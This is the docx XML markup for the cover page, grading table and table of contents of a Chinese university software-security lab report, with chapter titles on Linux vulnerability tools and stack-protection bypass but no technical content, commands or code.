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B9A181">
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc164150354"/>
    </w:p>
    <w:p w14:paraId="2CDCB384">
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A196D1">
      <w:pPr>
        <w:spacing w:before="616" w:beforeLines="150"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“软件安全”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858BB2F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F142830">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE9E2F4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1267545B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEDA81C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2100"/>
        </w:tabs>
        <w:spacing w:before="411" w:beforeLines="100"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFFC9B1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b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班    级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>　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE59C2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="282"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1022684675"/>
        </w:rPr>
        <w:t>姓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1022684675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>　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US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　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US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　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85F188">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="282"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1022684676"/>
        </w:rPr>
        <w:t>学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:fitText w:val="1124" w:id="1022684676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>　　　</w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:hAnsi="宋体"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B260E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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"/>
        <w:gridCol w:w="1283"/>
        <w:gridCol w:w="1195"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1373"/>
      </w:tblGrid>
      <w:tr w14:paraId="40C26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1" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3A8C9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项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C5206E2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撰写规范</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="037708D5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实验过程</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388FCE20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问题分析与小结</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54DE212A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总分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DDFBE9B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教师签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59BF9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1" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="183AF26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分值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319709F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195" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0FB29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2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B5E72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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B6EE2C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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC9D8A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14:paraId="6787DF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1" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788B6478">
            <w:pPr>
              <w:spacing w:before="205" w:beforeLines="5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评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1283" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F2EA73">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A8494E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95" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B01C63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</w:tcPr>
          <w:p w14:paraId="54303E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5AB1021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73" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EB29D6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30C87824">
      <w:pPr>
        <w:sectPr>
          <w:footerReference r:id="rId3" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1" w:chapSep="period"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="411" w:charSpace="-2714"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="1BA2087E">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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bookmarkStart w:id="1" w:name="_Toc164240109"/>
      <w:bookmarkStart w:id="2" w:name="_Toc164850838"/>
      <w:bookmarkStart w:id="3" w:name="_Toc164847384"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>目　录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/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"1-2" \h \z \u</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C043C">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="341"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1514729980 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Linux平台漏洞攻防工具使用</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1514729980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5D945F23">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1563598313 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1563598313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715C4C7D">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1545948537 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1545948537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19748CAD">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc287197033 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc287197033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62F5A02A">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1706758085 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1706758085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50790D73">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="341"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc601835307 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>保护机制绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc601835307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55D958D0">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1490919153 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1490919153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36C56DA7">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1528328216 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1528328216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79CE0B6D">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc719950704 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc719950704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3F6FE004">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="454"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc2055905307 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc2055905307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60914DD2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="341"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1284149273 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.实验遇到的难点与问题分析</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1284149273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1718569C">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9070"/>
          <w:tab w:val="clear" w:pos="341"/>
          <w:tab w:val="clear" w:pos="9080"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc1598695639 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.实验小结</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1598695639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7807977F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="411" w:after="411" w:line="480" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
          <w:pgNumType w:fmt="upperRoman" w:start="1" w:chapSep="period"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:type="linesAndChars" w:linePitch="411" w:charSpace="-2714"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B893940">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="328" w:after="328"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Toc1514729980"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Linux平台漏洞攻防工具使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="186DC3E7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="328" w:after="164"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc1563598313"/>
      <w:bookmarkStart w:id="6" w:name="_Toc164150360"/>
      <w:r>
        <w:rPr>
